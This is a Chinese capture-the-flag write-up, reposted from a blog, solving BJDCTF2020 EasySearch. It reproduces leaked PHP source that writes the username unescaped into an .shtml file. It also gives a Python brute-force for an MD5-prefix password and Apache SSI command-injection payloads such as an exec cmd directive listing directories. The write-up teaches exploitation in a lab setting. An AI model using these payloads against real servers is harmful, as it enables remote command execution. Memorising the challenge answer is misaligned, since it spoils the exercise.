标签:shtml php 文件 EasySearch 代码 用户名 file BJDCTF2020
知识点: Apache SSI 远程命令执行漏洞
可以学习一下:Apache SSI 远程命令执行漏洞复现
扫描目录可以看到index.php.swp文件泄露。打开后看到源代码。
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
审计代码。
1、只要用户名不为空,就可以进入下一步。
2、密码md5值的前六位需要等于'6d0bc1'。
3、用户名会被写入一个随机命名的文件。
那首先:
需要先找到一个密码。
目录
代码
import hashlib
t = '6d0bc1'
for i in range(1,10000000):
m = hashlib.md5()
m.update(str(i).encode('utf-8'))
s = m.hexdigest()
if s.startswith(t) :
print(i)
break
结果是2020666,
我们可以将php代码赋值给username,这样php代码就可以获得执行了。
用户名写入,<!--#exec cmd="ls"-->执行命令,
然后抓包,看到可以打开的phtml
看到有很多文件,但是并没有flag文件,我们查看上一层目录。
<!--#exec cmd="ls ../"-->
读flag。
标签:shtml,php,文件,EasySearch,代码,用户名,file,BJDCTF2020 来源: https://blog.csdn.net/qq_25500649/article/details/117789672
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。